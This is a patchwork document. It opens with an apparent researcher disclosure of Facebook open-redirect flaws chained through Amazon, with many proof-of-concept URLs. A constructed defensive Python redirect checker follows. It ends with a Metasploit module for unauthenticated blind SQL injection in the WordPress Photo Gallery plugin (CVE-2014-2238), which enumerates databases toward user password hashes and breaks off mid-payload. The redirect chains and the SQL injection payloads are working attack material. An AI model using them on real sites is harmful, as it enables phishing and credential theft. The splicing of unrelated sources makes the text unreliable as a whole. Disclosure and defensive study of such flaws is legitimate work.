*(1.1)* Two Facebook vulnerabilities are introduced in this article. Facebook has a security problem: it can be exploited by Open Redirect attacks. Since Facebook is trusted by large numbers of other websites, those vulnerabilities can be used to do "Covert Redirect" to other websites such as Amazon, eBay, etc.

*(1.1.1)* One Facebook Open Redirect vulnerability was reported to Facebook. Facebook adopted a new mechanism to patch it. Though the reported URL redirection vulnerabilities are patched, all old generated URLs are still vulnerable to the attacks. Section (2) gives the details. The reason may be related to Facebook's third-party interaction system or database management system or both. Another reason may be related to Facebook's design for different kinds of browsers.

*(1.1.2)* Another new Open Redirect vulnerability related to Facebook is introduced, too. For reference, please read section (3).

Tests were performed on Firefox (version 26.0) on Windows 7; Firefox (version 24.0) on Ubuntu 12.10; Chrome (version 30.0.1599.114) on Ubuntu 12.10.

*(1.2) Facebook's URL Redirection System Related to "*.php" Files*

All URL redirections are based on several files, such as l.php, a.php, landing.php and so on. The main redirection is based on the file "l.php". For the file "l.php", one parameter "h" is used for authentication. For the file "a.php", the parameter "eid" is used for authentication. Both files use the parameter "u" for the URL redirected to. In some other files such as "landing.php", parameters such as "url" and "next" are used.

<1> For parameter "h", two forms of authentication are used.
<a>h=HAQHyinFq <b>h=hAQHalW1CAQHrkVIQNNqgwhxRWLNsFVeH3auuImlbR1CgKA <2>For parameter "eid", one form of authentication is used. <a>eid=AQLP8sRq6lbU0jz0lARx9A9uetB6FIF1N2-Yjj_ePj0d_ezubjstZeDo6qDsalKVJwy6uDb_hQ-9tBsA2dVoQRq0lniOu0os_gPe3gY5l8lYblhQSwBtdvgjXjNqa xLZMYoasr3vv46tFsh1fL7q4kjT2LFw52dnJWd4SE8qc0YuPWf gPeQywgM2wl0CoW-lftWkr2dX0dLcytyHjXnvhKfVS_pQBllszUzsPENxE6EuZ-53Lh188o56idnfyyk2L58pE7C94PF-za4ZVB0qbuA2EnPcSJI-7oIiIJmIhifHe0CYTzG512-Z_heN44VlyJHevhS9auAR8-lFCAIlYymnT_Qiwp92RxjNOfBypBvszQUrvB6PH3fANn1prfMB Vm4RD_GFel14KVDS5USswbTOTkL3sZNhHUqqPHwBwU3JFePMMu wsfesigH85B_AxCsXUIWN7klKGSq8bPPsKSHttsa9hkkMpSfRK L7D_xwW4dU2xlmfGWil7jYRJmwfbOeF0zujk1FRBuM757tbfFM av-J-K9npbdrDrCuUVqV__Tf7CGZ89nPl-M2d09pE9enJj0OBXOaSXZX16LKaYnv1Wh4GKme7C-EOunITxyQtp1zy-48Uaz9mxO2x4bw7sBDfzDStF_Al8_0SMjWNTh-J38rBHAgT96X-dPFI43HU3x3fVymE9szrclBpvTaSfYezatgMzf77s3lQrQAMSl wSSRIzRuoFvQBmWKT0T5ZFgH5ykhYKhNMiKj577UO5g2Ojm-_-KKF4N_DBuG5R-I6EOSlhok2xUkpKVDnDcxZFTLxGmx5xc56J5kZLjJ96wnF2fH0 9Q19Qc2aU3xYFlEFrKjrlLpwGyOyCDx7_z7y1O4Efqew3Fa0Cb 9s6Kk2jpLF5XEIaYzzXOLAffxXG6icBJVovb9RPmiZ5s9dKYYo tLol68_X04O05bEvVccPEh-IQwX_VTMt3f23be2MECEq R2l1A1ZkJx4qP00GI1pZhU_CXAnjSaTNmtaINRUeSsLNEZZsPw pWJMfeeGSwuof9krC05eSWjO0jH9tua0KteMYhj8i-3dwSBp4f7nMcFwH5ltfCLhMCYNB8rxgzcAczyhLIo2UY-3FSaJXBZ0lvuZBvnj7myUnyc2lCcy-fWh93MRRaJrrinjtfr9fDSMHM9Cja5xi0eG3Vs0aClnWbeJZA7 9TvmYt7E53HfwGuv5-EJOqRh3cwZF-53uPHA73ikUk3xTApjQunJM4uIBhpy7iBIgn_OXXo3X03YUJtJ cDuC20ocJbZ310VHliox5tYZF2oiMaOfgo9Y9KeqgsrJgwPCJe if4aB0Ne4g_oM_Tuqt2pXbdgoCawHIApF087eFKJqejp0jpEkJ erXPyK-IqsD_SQfIm_2WJSkzwzATwQKs *(2) Vulnerability Description 1:* *(2.1) *A security researcher reported two Open Redirect vulnerabilities to Facebook in 2013. The following are the two links reported. http://www.facebook.com/l.php?u=http://www.bing.com&h=mAQHgtP_E http://facebook.com/campaign/landing.php?url=http://www.adcash.com Though a new mechanism was adopted. However, all old generated redirections still work by parameter "h" and "eid". 
*(2.2)* A website was used for the following tests. The website is "http://www.tetraph.com/". Suppose this website is malicious.

*(2.2.1)* <1> First test
<a> file: "l.php"
<b> URL parameter: "u"
<c> authentication parameter: "h"
<d> form: "h=HAQHyinFq".
<e> The authentication has no relation to all other parameters, such as "s".

Examples:

*URL 1:*
http://www.facebook.com/l.php?u=http%3A%2F%2Fwww.aboutads.info%2F&h=lAQHmVMhS&s=1

*Redirect Forbidden:*
http://www.facebook.com/l.php?u=http%3A%2F%2Fwww.tetraph.com&h=lAQHmVMhS&s=1

*Redirect Works:*
http://www.facebook.com/l.php?u=http%3A%2F%2Fwww.tetraph.com&h=zAQHEyzSM&s=1

*URL 2:*
http://bg-bg.facebook.com/l.php?u=http%3A%2F%2Fweborama.com%2F&h=DAQEpwCpS&s=1

*Redirect Forbidden:*
http://bg-bg.facebook.com/l.php?u=http%3A%2F%2Fwww.tetraph.com&h=DAQEpwCpS&s=1

*Redirect Works:*
http://bg-bg.facebook.com/l.php?u=http%3A%2F%2Fwww.tetraph.com&h=wAQEE6xBX&s=1

*(2.2.2)* <2> Second test. It is the same situation as above.
<a> file: "l.php"
<b> URL parameter: "u"
<c> authentication parameter: "h"
<d> form: "h=hAQHalW1CAQHrkVIQNNqgwhxRWLNsFVeH3auuImlbR1CgKA".
<e> The authentication has no relation to all other parameters, such as "env", "s".
Examples: *URL 1:* http://www.facebook.com/l.php?u=http%3A%2F%2Fwww.internet.org%2F&h=pAQHnUOVGAQGcsXLy0MBttG7W1uiOvSghc_POwYa6k35hbw&enc=AZNBNYyWIbhPD6ZDAw1Zom458dO6dNBHnPh1tWnzEgxsxq vjfAbnH1ynSYgNNOvQzY7oolrIRfkll4-z2Pm7C63N&s=1 *Redirect Forbidden:* http://www.facebook.com/l.php?u=http%3A%2F%2Fwww.tetraph.com&h=pAQHnUOVGAQGcsXLy0MBttG7W1uiOvSghc_POwYa6k35hbw&enc=AZNBNYyWIbhPD6ZDAw1Zom458dO6dNBHnPh1tWnzEgxsxq vjfAbnH1ynSYgNNOvQzY7oolrIRfkll4-z2Pm7C63N&s=1 *Redirect Works:* http://www.facebook.com/l.php?u=http%3A%2F%2Fwww.tetraph.com&h=1AQFqhVX6AQGawLw_EuB6T8h4Fs6JXFOocaRp0tQKr6Mfxw&enc=AZM7oFmJObAuJmy999wnRjD-QralcP-Ust3CHBrFxZ85bS1oI5vS46cPhdJmYq6YcfsTcZYBrPTRsZyEe HCe_rdQ&s=1 http://www.facebook.com/l.php?u=http%3A%2F%2Fwww.tetraph.com&h=1AQFqhVX6AQGawLw_EuB6T8h4Fs6JXFOocaRp0tQKr6Mfxw *URL 2:* http://af-za.facebook.com/l.php?u=http%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3 DNdWaZkvAJfM&h=WAQEcLD6fAQHtLbKKDhiimLXlIIx0zoyjfyusHjY5YHmaGQ&enc=AZMtxhh0RHpegvMkZLG-uyFxqCzDxCefM9H2AF8TnVCTtGMnwy5WVA4EPcZVOiJ0wOFCui 6nWmRBqQDoZE0cVww6&s=1 *Redirect Forbidden:* http://af-za.facebook.com/l.php?u=http%3A%2F%2Fwww.tetraph.com&h=GAQHkk7KaAQFgp-1UpPt8vTc1mpZVcR-ZCObBHYZTd6oRUA&enc=AZPA-1iOt4L5BTDo2RMqXagplQxCjYMuw6LZzH3XdMeOpvvcwMdzZwp lx5OZLlH0q8QszFr2Nu9Ib_tA8l8So-pW&s=1 *Redirect Works:* http://af-za.facebook.com/l.php?u=http%3A%2F%2Fwww.tetraph.com&h=WAQEcLD6fAQHtLbKKDhiimLXlIIx0zoyjfyusHjY5YHmaGQ&enc=AZMtxhh0RHpegvMkZLG-uyFxqCzDxCefM9H2AF8TnVCTtGMnwy5WVA4EPcZVOiJ0wOFCui 6nWmRBqQDoZE0cVww6&s=1 *(3) Facebook File "a.php" Open Redirect Security Vulnerability* *(3.1)* <a>file: "a.php" <b>parameter "u" <c> authentication parameter: "eid" <d> form: "eid=5967147530925355409.6013336879369.AQKBG5nt468Y gKeiSdgExZQRjwGb9r6EOu-Uc5WPvi-EVHEzadq8YSrgSvUzbMmxKPPfTgM-JrPff7tN38luc-8h16lxL0Gj_4qs1-58yWgXirMH4AEf8sOEsZc5DTx7yFndgODvD5NrC-314BIj4pZvMhlljXv89lHRH6pBgyGGVm-oWBDIF8CuRER1f5ZGbKdsiUcBISdWTninVzvBdW1mZY0SWzqT2 1fZmhgVKtdkRf5l_pag7hAmotFK9HI5XHfGicWVqzRyTNiDIYj 
yVjTv4km2FOEp7WP3w65aVUKP_w". <e>The authentication has no relation to all other parameters, such as "mac", "_tn_". Examples: *Vulnerable URL:* https://www.facebook.com/a.php?u=http%3A%2F%2Ffb-nym.adnxs.com%2Ffclick%3Fclickenc%3Dhttp%253A%252F %252Fbs.serving-sys.com%252FBurstingPipe%252FadServer.bs%253Fcn%25 3Dtf%2526c%253D20%2526mc%253Dclick%2526pli%253D878 2431%2526PluID%253D0%2526ord%253D%257BCACHEBUSTER% 257D%26cp%3D%253Fdi%253DzGxX6INl-T9QvRSibN_3P5qZmZmZmfk_UL0Uomzf9z_ObFfog2X5P_WPPCu D-to_CKEeLew3cQIQkc9SAAAAAHQcDQB2BQAAKAcAAAIAAAD4iq8 AanMCAAAAAQBVU0QAVVNEAGMASABq4DoFka4BAgUCAQUAAIgAk inLswAAAAA.%252Fcnd%253D%252521qQYdPgjeqqYBEPiVvgU Y6uYJIAA.%252Freferrer%253Dfacebook.com%252F&mac=AQJllyaGzLYoRoQz&__tn__=%2AB&eid=5967147530925355409.6013336879369.AQKBG5nt468Y gKeiSdgExZQRjwGb9r6EOu-Uc5WPvi-EVHEzadq8YSrgSvUzbMmxKPPfTgM-JrPff7tN38luc-8h16lxL0Gj_4qs1-58yWgXirMH4AEf8sOEsZc5DTx7yFndgODvD5NrC-314BIj4pZvMhlljXv89lHRH6pBgyGGVm-oWBDIF8CuRER1f5ZGbKdsiUcBISdWTninVzvBdW1mZY0SWzqT2 1fZmhgVKtdkRf5l_pag7hAmotFK9HI5XHfGicWVqzRyTNiDIYj yVjTv4km2FOEp7WP3w65aVUKP_w *POC:* https://www.facebook.com/a.php?u=http%3A%2F%2Fwww.tetraph.com&mac=AQJllyaGzLYoRoQz&__tn__=%2AB&eid=5967147530925355409.6013336879369.AQKBG5nt468Y gKeiSdgExZQRjwGb9r6EOu-Uc5WPvi-EVHEzadq8YSrgSvUzbMmxKPPfTgM-JrPff7tN38luc-8h16lxL0Gj_4qs1-58yWgXirMH4AEf8sOEsZc5DTx7yFndgODvD5NrC-314BIj4pZvMhlljXv89lHRH6pBgyGGVm-oWBDIF8CuRER1f5ZGbKdsiUcBISdWTninVzvBdW1mZY0SWzqT2 1fZmhgVKtdkRf5l_pag7hAmotFK9HI5XHfGicWVqzRyTNiDIYj yVjTv4km2FOEp7WP3w65aVUKP_w https://www.facebook.com/a.php?u=http%3A%2F%2Fwww.xhamster.com&eid=5967147530925355409.6013336879369.AQKBG5nt468Y gKeiSdgExZQRjwGb9r6EOu-Uc5WPvi-EVHEzadq8YSrgSvUzbMmxKPPfTgM-JrPff7tN38luc-8h16lxL0Gj_4qs1-58yWgXirMH4AEf8sOEsZc5DTx7yFndgODvD5NrC-314BIj4pZvMhlljXv89lHRH6pBgyGGVm-oWBDIF8CuRER1f5ZGbKdsiUcBISdWTninVzvBdW1mZY0SWzqT2 1fZmhgVKtdkRf5l_pag7hAmotFK9HI5XHfGicWVqzRyTNiDIYj yVjTv4km2FOEp7WP3w65aVUKP_w *(3.2) Facebook Login Page Covert Redirect Security Vulnerability* 
*Vulnerable URL Related to Login.php Based on a.php:* https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fa. php%3Fu%3Dhttp%253A%252F%252Fwww.rp.edu.sg%252Fope nhouse2014%252F%253Futm_source%253Dfacebook%2526ut m_medium%253Dcpc%2526utm_campaign%253Dopenhouse201 4%26mac%3DAQKyRHClixA20iGL%26__tn__%3D%252AB%26eid %3DAQLAHC7szSXhT3FaEBXe5YFsOC0kEM4nN9PlVovdilvuzRO StFXoYqptlKpcJAzHNTLpxWAIrmJYsR6RVG_Htk6pgT7Iol6lW HDJvn7Cg5sqigvE_eVS895Eh6fSwxH3fgfWcNDrEl5_lFgRbrJ tC71R68rW_VXS9QCN7Po9wTWDnbyZTaXawdrdQyibryvA56Spr 5GcUDUboRFxy8YSr2ahUV_goDAQA3OKmCACEn8CmyMrOT5gZq3 iwusysdchRxLIv5N82-GMTiDxXXgkDYf1P7XwvklWpfy_cEItZzV5v0P7fRZB3qiq_RDx 9jhEzndlJhUJL2aWE0ldPmGKGz9xWyvPaPLOwzBo23GQbpj2ZN _tw9B9tz2l3tGIN1yegd_Wf6PSFIZOuBXfZILvmILcxg3qz4dH x1fmgPZBpf_34mPnMEkgZqbT2WeV_GZKz8RDIg88D3vrmwyMwW xeh3xyGuddjZUjOUjPCUwrgSrWZK3XHRA7TA7tWIsQ4X1bsjx9 c72mm8bZmmRBRJwqOcjsW0QEVETs_Cs9pS9QBkgX8yVPJCHuk1 v_xkj4EHHH9sNP7a4GRs8olklBTKhCcJ908sVrQVT2I-cQYw2SVU9hWaWWjX2AGt3WpdT2kx6SIPoPQpX5cIC4Lcfaa7Ec ZFBnoQPv3mR5BNHRFTh_6Qvr01BrCG3Fv5VeDeXhM8cHk6VuBt j5 smz0ZeGT5JWvub5ORJ4xzVN0zAW8V4qiKiVFKTEFMZASaZFon4 1VFCbhxkX0Bi62Ko64PY6uP64tCMWh6yX2o0JMc0mJWFJRp169 5OCKgLXf0udRyWDESTyYgJXIlxecCmlwCEbleAsE-wtDXNOfDTXOzApr1sZO_58FBRaw-K4Z2VRXLir5mrdXTKnM1Y4rDDqGZur9G7LfuXrCr5oR1J5LJ8s VupHqsiN7-UqdakiEEIBq750KxVjaAdCyqJp_5EJ-yVMK3f2pMX7cQ2Lw6u434hHimuLN9VDPLkpSiMlPOa8RkarDSr ed73IfQiv-PluegYDfunZFxj1KvcAlzhVZsL-a52hJmXrOrzKuV0hyZaBLtAIo6AEoXXV30D-6iraSUphkOFzYt3ah6oRrmXLQZKm2E8Cuag5d_rAnwvIr98dn4 OSa8Z4MCZemI3uH8cjxr86aE046uTA_Hm1GjYM5l7wkpHknHI8 QR2q5Cioo2h6WiUO-jsIFkQ4XFgAd5IUCcAbQukXdC4GJzl18iaN8wkylsTk8aVBn6G 1xZadSL0b5R3NgsYfQUVtV0g9slnOLNkgq0NLMAk0kWFs *POC:* https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fa. 
php%3Fu%3Dhttp%253A%252F%252Fwww.stackoverflow.com %26mac%3DAQKyRHClixA20iGL%26__tn__%3D%252AB%26eid% 3DAQLAHC7szSXhT3FaEBXe5YFsOC0kEM4nN9PlVovdilvuzROS tFXoYqptlKpcJAzHNTLpxWAIrmJYsR6RVG_Htk6pgT7Iol6lWH DJvn7Cg5sqigvE_eVS895Eh6fSwxH3fgfWcNDrEl5_lFgRbrJt C71R68rW_VXS9QCN7Po9wTWDnbyZTaXawdrdQyibryvA56Spr5 GcUDUboRFxy8YSr2ahUV_goDAQA3OKmCACEn8CmyMrOT5gZq3i wusysdchRxLIv5N82-GMTiDxXXgkDYf1P7XwvklWpfy_cEItZzV5v0P7fRZB3qiq_RDx 9jhEzndlJhUJL2aWE0ldPmGKGz9xWyvPaPLOwzBo23GQbpj2ZN _tw9B9tz2l3tGIN1yegd_Wf6PSFIZOuBXfZILvmILcxg3qz4dH x1fmgPZBpf_34mPnMEkgZqbT2WeV_GZKz8RDIg88D3vrmwyMwW xeh3xyGuddjZUjOUjPCUwrgSrWZK3XHRA7TA7tWIsQ4X1bsjx9 c72mm8bZmmRBRJwqOcjsW0QEVETs_Cs9pS9QBkgX8yVPJCHuk1 v_xkj4EHHH9sNP7a4GRs8olklBTKhCcJ908sVrQVT2I-cQYw2SVU9hWaWWjX2AGt3WpdT2kx6SIPoPQpX5cIC4Lcfaa7Ec ZFBnoQPv3mR5BNHRFTh_6Qvr01BrCG3Fv5VeDeXhM8cHk6VuBt j5smz0ZeGT5JWvub5ORJ4xzVN0zAW8V4qiKiVFKTEFMZASaZFo n41VFCbhxkX0Bi62Ko64PY6uP64tCMWh6yX2o0JMc0mJWFJRp1 695 OCKgLXf0udRyWDESTyYgJXIlxecCmlwCEbleAsE-wtDXNOfDTXOzApr1sZO_58FBRaw-K4Z2VRXLir5mrdXTKnM1Y4rDDqGZur9G7LfuXrCr5oR1J5LJ8s VupHqsiN7-UqdakiEEIBq750KxVjaAdCyqJp_5EJ-yVMK3f2pMX7cQ2Lw6u434hHimuLN9VDPLkpSiMlPOa8RkarDSr ed73IfQiv-PluegYDfunZFxj1KvcAlzhVZsL-a52hJmXrOrzKuV0hyZaBLtAIo6AEoXXV30D-6iraSUphkOFzYt3ah6oRrmXLQZKm2E8Cuag5d_rAnwvIr98dn4 OSa8Z4MCZemI3uH8cjxr86aE046uTA_Hm1GjYM5l7wkpHknHI8 QR2q5Cioo2h6WiUO-jsIFkQ4XFgAd5IUCcAbQukXdC4GJzl18iaN8wkylsTk8aVBn6G 1xZadSL0b5R3NgsYfQUVtV0g9slnOLNkgq0NLMAk0kWFs *(4) Amazon Covert Redirect Security Vulnerability Based on Facebook * Since Facebook is trusted by large numbers of other websites. Those vulnerabilities can be used to do "Covert Redirect" to other websites such as Amazon. The vulnerability exists at "redirect.html?" page with "&location" parameter, e.g. 
http://www.amazon.com/gp/redirect.html?_encoding=UTF8&location=http%3A%2F%2Fwww.facebook.com%2Fl.php%3Fu%3Dhttp%253A%252F%252Fwww.google.com%26h%3D7AQFwCeYDAQEZsz_cx9BJKCE5Af7KKocYw4jOlGk5TB5kZg&token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1

*More Details:*
http://tetraph.com/covert_redirect/
http://tetraph.com/covert_redirect/oauth2_openid_covert_redirect.html

*(4.1)* When a user is redirected from Amazon to another site, Amazon will check the parameter "&token". If the redirected URL's domain is OK, Amazon will allow the redirection. However, if the URLs in a redirected domain have open URL redirection vulnerabilities themselves, a user could be redirected from Amazon to a vulnerable URL in that domain first and later be redirected from this vulnerable site to a malicious site. This is as if being redirected from Amazon directly. One of the vulnerable domains is http://www.facebook.com

*(4.2)* Use one of the webpages for the following tests. The webpage address is "http://www.inzeed.com/kaleidoscope". Suppose it is malicious.
*Vulnerable URL:*
http://www.amazon.com/gp/redirect.html?_encoding=UTF8&location=http%3A%2F%2Fwww.facebook.com%2Famazon%3Fv%3Dapp_165157536856903&token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1

*POC:*
http://www.amazon.com/gp/redirect.html?_encoding=UTF8&location=http%3A%2F%2Fwww.facebook.com%2Fl.php%3Fu%3Dhttp%253A%252F%252Fwww.inzeed.com%26h%3D7AQFwCeYDAQEZsz_cx9BJKCE5Af7KKocYw4jOlGk5TB5kZg&token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1

http://www.amazon.de/gp/redirect.html/ref=cm_sw_cl_fa_dp_1bI9sb0R0MNZH?_encoding=UTF8&location=http%3A%2F%2Fwww.facebook.com%2Fl.php%3Fu%3Dhttp%253A%252F%252Fwww.nicovideo.jp%26h%3D7AQFwCeYDAQEZsz_cx9BJKCE5Af7KKocYw4jOlGk5TB5kZg&token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1

http://www.amazon.co.uk/gp/redirect.html/ref=cm_sw_cl_fa_dp_Zzbbtb04XETQB?_encoding=UTF8&location=http%3A%2F%2Fwww.facebook.com%2Fl.php%3Fu%3Dhttp%253A%252F%252Fwww.bbc.co.uk%26h%3D7AQFwCeYDAQEZsz_cx9BJKCE5Af7KKocYw4jOlGk5TB5kZg&token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1

http://www.amazon.ca/gp/redirect.html/ref=cm_sw_cl_fa_dp_G7uctb099ZX2N?_encoding=UTF8&location=http%3A%2F%2Fwww.facebook.com%2Fl.php%3Fu%3Dhttp%253A%252F%252Fgoogleadservices.com%26h%3D_AQHylR65AQG3dZfbwarP74zIO_Gj_ndx4h1QB1r7qbJx4Q&token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1

https://www.amazon.co.jp/gp/redirect.html/ref=amb_link_64307649_2?location=http%3A%2F%2Fwww.facebook.com%2Fl.php%3Fu%3Dhttp%253A%252F%252Fwww.pornhub.com%26h%3D_AQHylR65AQG3dZfbwarP74zIO_Gj_ndx4h1QB1r7qbJx4Q&pf_rd_m=AN1VRQENFRJN5&pf_rd_s=left-2&pf_rd_r=15EZARSP2Q0PG0JW0ZB0&pf_rd_t=101&pf_rd_p=122450949&pf_rd_i=2221688051

https://www.amazon.fr/gp/redirect.html/ref=amb_link_64307649_2?location=http%3A%2F%2Fwww.facebook.com%2Fl.php%3Fu%3Dhttp%253A%252F%252Fwww.naver.com%26h%3D_AQHylR65AQG3dZfbwarP74zIO_Gj_ndx4h1QB1r7qbJx4Q&pf_rd_m=AN1VRQENFRJN5&pf_rd_s=left-2&pf_rd_r=15EZARSP2Q0PG0JW0ZB0&pf_rd_t=101&pf_rd_p=122450949&pf_rd_i=2221688051

https://www.amazon.it/gp/redirect.html/ref=amb_link_64307649_2?location=http%3A%2F%2Fwww.facebook.com%2Fl.php%3Fu%3Dhttp%253A%252F%252Fwww.craigslist.org%26h%3D_AQHylR65AQG3dZfbwarP74zIO_Gj_ndx4h1QB1r7qbJx4Q&pf_rd_m=AN1VRQENFRJN5&pf_rd_s=left-2&pf_rd_r=15EZARSP2Q0PG0JW0ZB0&pf_rd_t=101&pf_rd_p=122450949&pf_rd_i=2221688051

*POC Video:*
https://www.youtube.com/watch?v=ss3ALnvU63w&feature=youtu.be
https://www.youtube.com/watch?v=f4W63YXnbIk

*Blog Details:*
http://securityrelated.blogspot.com/2015/01/amazon-covert-redirect-security.html

Those vulnerabilities were reported to Facebook in 2014 and they have been patched.

*POC Video:*
https://www.youtube.com/watch?v=VvhmxfKt85Q&feature=youtu.be

*Blog Details:*
http://securityrelated.blogspot.com/2015/01/facebook-old-generated-urls-still.html

--
Wang Jing
School of Physical and Mathematical Sciences (SPMS)
Nanyang Technological University (NTU), Singapore &

Source
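As an added example (not Facebook's or Amazon's code), the redirect check below shows the two properties the advisory's findings call for on the defending side: the "h"-style token is bound to the exact destination and carries a key generation, so links minted under a retired mechanism stop verifying (the section (2) "old generated URLs" case), and an unsigned destination on a trusted host is screened for a nested redirect before it is allowed (the section (4) Amazon-to-facebook.com chain). All key ids, secrets, hosts and URLs in it are constructed.

```python
"""Signed redirect endpoint: the token is bound to the exact destination,
carries a key generation and an expiry, and is refused once its key
generation is retired, so links minted under an old mechanism stop working.

Added example; not Facebook's code. Key ids, secrets, hosts and URLs are
constructed for illustration.
"""
import base64
import hashlib
import hmac
import time
from urllib.parse import parse_qsl, urlparse

# Constructed secrets, one per generation of the redirect mechanism.
SIGNING_KEYS = {
    "v1": b"old-generation-secret-constructed",
    "v2": b"new-generation-secret-constructed",
}
CURRENT_KEY_ID = "v2"
TOKEN_TTL = 24 * 3600  # seconds a minted link stays valid

# Constructed host that may be reached without a signature. An allow-list
# by host is not enough on its own: if that host runs its own open
# redirector, the chain in section (4) (Amazon -> facebook.com/l.php -> X)
# still works, so unsigned destinations are also screened for nesting.
TRUSTED_HOSTS = {"www.example-trusted.test"}


def _mac(key, url, exp):
    """HMAC over expiry and destination; binds the token to this exact URL."""
    msg = f"{exp}|{url}".encode()
    digest = hmac.new(key, msg, hashlib.sha256).digest()
    return base64.urlsafe_b64encode(digest).decode().rstrip("=")


def make_token(url, key_id=CURRENT_KEY_ID, now=None, ttl=TOKEN_TTL):
    """Mint the 'h'-style token for a destination: <key id>.<expiry>.<mac>."""
    now = int(time.time()) if now is None else now
    exp = now + ttl
    return f"{key_id}.{exp}.{_mac(SIGNING_KEYS[key_id], url, exp)}"


def verify_token(url, token, now=None, retired_keys=()):
    """True only if token was minted for url, is unexpired, and its key
    generation is still accepted. Retiring a generation invalidates every
    link minted under it, which is what the 'old generated URLs' case needs."""
    now = int(time.time()) if now is None else now
    try:
        key_id, exp_text, mac = token.split(".", 2)
        exp = int(exp_text)
    except ValueError:
        return False
    if key_id in retired_keys or key_id not in SIGNING_KEYS:
        return False
    if now > exp:
        return False
    expected = _mac(SIGNING_KEYS[key_id], url, exp)
    return hmac.compare_digest(expected, mac)


def looks_like_nested_redirect(url):
    """Heuristic: the destination's query carries another absolute URL,
    the shape of a redirector being used as a hop (e.g. l.php?u=http...)."""
    for _, value in parse_qsl(urlparse(url).query, keep_blank_values=True):
        inner = urlparse(value)
        if inner.scheme in ("http", "https") and inner.netloc:
            return True
    return False


def authorize_redirect(u, h, now=None, retired_keys=()):
    """Decide whether the redirect to u may proceed.

    Signed links are honoured when the signature verifies; unsigned links
    only for a trusted host that does not itself look like a redirector."""
    parsed = urlparse(u)
    if parsed.scheme not in ("http", "https") or not parsed.netloc:
        return False  # rejects javascript:, data:, protocol-relative and relative targets
    if h and verify_token(u, h, now=now, retired_keys=retired_keys):
        return True
    return parsed.hostname in TRUSTED_HOSTS and not looks_like_nested_redirect(u)


if __name__ == "__main__":
    dest = "http://www.example-dest.test/page"
    old_link = make_token(dest, key_id="v1", now=1_000_000)
    print("old link, v1 still accepted:", verify_token(dest, old_link, now=1_000_100))
    print("old link, v1 retired:      ",
          verify_token(dest, old_link, now=1_000_100, retired_keys=("v1",)))
```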
-
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit4 < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => "Wordpress Photo Gallery Unauthenticated SQL Injection User Enumeration",
      'Description'    => %q{
        This module exploits an unauthenticated SQL injection in order to enumerate
        the Wordpress users tables, including password hashes. This module was
        tested against version 1.2.7.
      },
      'License'        => 'ExploitHub',
      'Author'         =>
        [
          'Brandon Perry <bperry.volatile[at]gmail.com>' # meatpistol module
        ],
      'References'     =>
        [
          ['CVE', '2014-2238'],
        ],
      'Platform'       => ['win', 'linux'],
      'Privileged'     => false,
      'DisclosureDate' => "Feb 28 2014"))

    register_options(
      [
        OptInt.new('GALLERYID', [false, 'Gallery ID to use. If not provided, the module will attempt to bruteforce one.', nil]),
        OptString.new('TARGETURI', [true, 'Relative URI of Wordpress installation', '/'])
      ], self.class)
  end

  # Baseline GET parameters of the GalleryBox AJAX action; 'order_by' is the
  # injection point and is appended to in send_injected_request.
  def get_params
    {
      'tag_id' => 0,
      'action' => 'GalleryBox',
      'current_view' => 0,
      'image_id' => 1,
      'gallery_id' => 1,
      'theme_id' => 1,
      'thumb_width' => 180,
      'thumb_height' => 90,
      'open_with_fullscreen' => 0,
      'open_with_autoplay' => 0,
      'image_width' => 800,
      'image_height' => 500,
      'image_effect' => 'fade',
      'sort_by' => 'order',
      'order_by' => 'asc',
      'enable_image_filmstrip' => 1,
      'image_filmstrip_height' => 70,
      'enable_image_ctrl_btn' => 1,
      'enable_image_fullscreen' => 1,
      'popup_enable_info' => 1,
      'popup_info_always_show' => 0,
      'popup_info_full_width' => 0,
      'popup_hit_counter' => 0,
      'popup_enable_rate' => 0,
      'slideshow_interval' => 5,
      'enable_comment_social' => 1,
      'enable_image_facebook' => 1,
      'enable_image_twitter' => 1,
      'enable_image_google' => 1,
      'enable_image_pinterest' => 0,
      'enable_image_tumblr' => 0,
      'watermark_type' => 'none',
      'current_url' => ''
    }
  end

  # Walk gallery IDs until one renders (the response then contains the
  # JavaScript data array initialiser).
  def bruteforce_gallery_id
    1.upto(666) do |i|
      get_vars = get_params
      get_vars['gallery_id'] = i
      res = send_request_cgi({
        'uri' => normalize_uri(target_uri.path, 'wp-admin', 'admin-ajax.php'),
        'vars_get' => get_vars
      })
      return i if res and res.body =~ /data\["0"\] = \[\];/
    end
    fail_with(Failure::Unknown, "Couldn't bruteforce a gallery ID, please explicitly supply a known good gallery ID")
  end

  def run
    gallery_id = datastore['GALLERYID']
    # GALLERYID has no default, so it is nil (not 0) when the user did not set it
    if gallery_id.nil? || gallery_id == 0
      print_status('No GALLERYID supplied, attempting bruteforce.')
      gallery_id = bruteforce_gallery_id
      print_status("Found a gallery with an ID of #{gallery_id}")
    end

    # Baseline response: a true condition leaves the response length unchanged,
    # a false one raises a MySQL error and changes it (boolean-based blind).
    parms = get_params
    parms['gallery_id'] = gallery_id
    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, 'wp-admin', 'admin-ajax.php'),
      'vars_get' => parms
    })
    real_length = res.body.length

    count = nil
    1.upto(999) do |i|
      payload = ",(SELECT (CASE WHEN ((SELECT IFNULL(COUNT(DISTINCT(schema_name)),0x20) FROM INFORMATION_SCHEMA.SCHEMATA) BETWEEN 0 AND #{i}) THEN 0x2061736320 ELSE 3181*(SELECT 3181 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))"
      res = send_injected_request(payload, gallery_id)
      count = i if res.body.length == real_length
      break if count
    end
    print_status("Looks like there are #{count} databases.")

    schemas = []
    0.upto(count - 1) do |i|
      length = nil
      1.upto(999) do |c|
        payload = ",(SELECT (CASE WHEN ((SELECT IFNULL(CHAR_LENGTH(schema_name),0x20) FROM (SELECT DISTINCT(schema_name) "
